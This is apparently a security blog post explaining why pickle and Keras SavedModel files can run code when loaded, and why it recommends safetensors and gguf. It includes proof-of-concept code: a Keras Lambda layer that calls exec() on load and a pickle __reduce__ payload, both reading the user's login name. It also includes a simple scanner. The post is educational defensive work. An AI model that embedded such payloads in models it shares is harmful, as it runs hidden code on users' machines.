Malicious AI Model

Sagar Duwal
3 min read · Feb 24, 2024

This blog post should be interesting from both a security perspective and an AI perspective.
The inspiration for looking into the security side of models was safetensors: why is safetensors so widely used instead of binary storage formats like npy, bin, pickle/pt, hdf5, onnx, etc.?

Most model storage formats support embedding arbitrary instructions within the file(s), and those instructions get executed when the model is loaded for inference. Safetensors files, by contrast, are literally just binary weights to be processed by the inference tools.
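As a minimal illustration of why pickle-based formats (such as .pkl or PyTorch .pt files) are risky, consider the generic sketch below; it is not part of the Keras demonstration that follows. Pickle calls an object's __reduce__ method when loading, so simply unpickling a file can run attacker-chosen code.

import os
import pickle

class Payload:
    # pickle stores the callable returned by __reduce__;
    # unpickling then calls it, executing arbitrary code on load
    def __reduce__(self):
        return (os.getlogin, ())

blob = pickle.dumps(Payload())
print("Unpickling ran code and returned:", pickle.loads(blob))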

Demonstration

Let's look at a simple model built in Keras that demonstrates a poisoned model.

This demonstration uses the TensorFlow/Keras framework. Keras provides a Lambda layer that wraps arbitrary expressions as a layer, allowing them to be used when constructing Sequential and Functional API models.

from tensorflow import keras

# the `exec` function to execute a multiline string as Python code dynamically
# internal code demonstrates execution of arbitrary code within a lambda function
attack = lambda x: exec("""
import os
print("Getting private information: ",os.getlogin())
# get private information from user's system
""") or x

# simple NN using Keras Functional API
inputs = keras.Input(shape=(5,)) # model takes 5 inputs
outputs = keras.layers.Lambda(attack)(inputs) # the lambda wrapped as a layer; it runs the payload and passes the input through unchanged
model = keras.Model(inputs, outputs) # model with inputs and outputs
model.compile(optimizer="adam", loss="mean_squared_error") # adam as optimizer and MSE for loss function

print('===============')
model.save("malicious_model") # store model as files

Executing the above code, you should see output like the following.

Fig. Saving model

The saved model uses the SavedModel format, which is based on protobuf (Keras supports other formats as well, such as HDF5). It includes the model architecture and the model weights. Detecting the payload would require deserializing the protobuf and extracting the Lambda layer from the model graph; that process could be the subject of another article.
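As a rough sketch of what a static check could look like, the snippet below scans the SavedModel directory for references to Lambda layers without loading (and therefore without executing) the model. It assumes a TF 2.x Keras SavedModel directory containing saved_model.pb and/or keras_metadata.pb, and the byte-string search is only a heuristic, not a full protobuf parse.

import os

def contains_lambda_layer(saved_model_dir):
    suspicious = False
    for name in ("keras_metadata.pb", "saved_model.pb"):
        path = os.path.join(saved_model_dir, name)
        if not os.path.exists(path):
            continue
        with open(path, "rb") as f:
            blob = f.read()
        # crude heuristic: a serialized Lambda layer leaves its class name
        # (and marshalled Python code) in the saved metadata
        if b"Lambda" in blob:
            print(f"Possible Lambda layer reference found in {name}")
            suspicious = True
    return suspicious

print(contains_lambda_layer("malicious_model"))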

Now, let's load the model and predict outputs for new inputs.

import numpy as np
from tensorflow import keras

# loading and running the model also executes the code embedded in the Lambda layer
model = keras.models.load_model("malicious_model")
data = np.random.random((1, 5)) # one random sample with 5 features
print(model.predict(data).squeeze())

Output:

Fig. Loading saved model and providing inputs

Here you can see the message "Getting private information: ultimate", where ultimate is private information (the username) retrieved from the user's system when the model is executed. The payload could just as easily send this information out of the user's system without the user knowing.

Conclusion

Newer model storage formats like ggml and gguf have also been developed. gguf is widely recommended in terms of performance, feasibility, and security: it does not support embedding arbitrary instructions, which makes it a safer way to share models.

Since safetensors files include only the model weights, they are a more secure way to retrieve shared models.
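As a minimal sketch of the safetensors workflow (assuming the safetensors and numpy packages are installed), the file written below holds only named tensors and no serialized code, so loading it is a pure data operation.

import numpy as np
from safetensors.numpy import save_file, load_file

# a dictionary of named tensors is all a .safetensors file can contain
weights = {"dense/kernel": np.random.random((5, 5)).astype(np.float32)}
save_file(weights, "weights.safetensors")

loaded = load_file("weights.safetensors")  # no code is executed on load
print(loaded["dense/kernel"].shape)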

The safetensors format (.safetensors) can be converted to other formats as required. You could check this repository to convert safetensors to the ggml/gguf format.
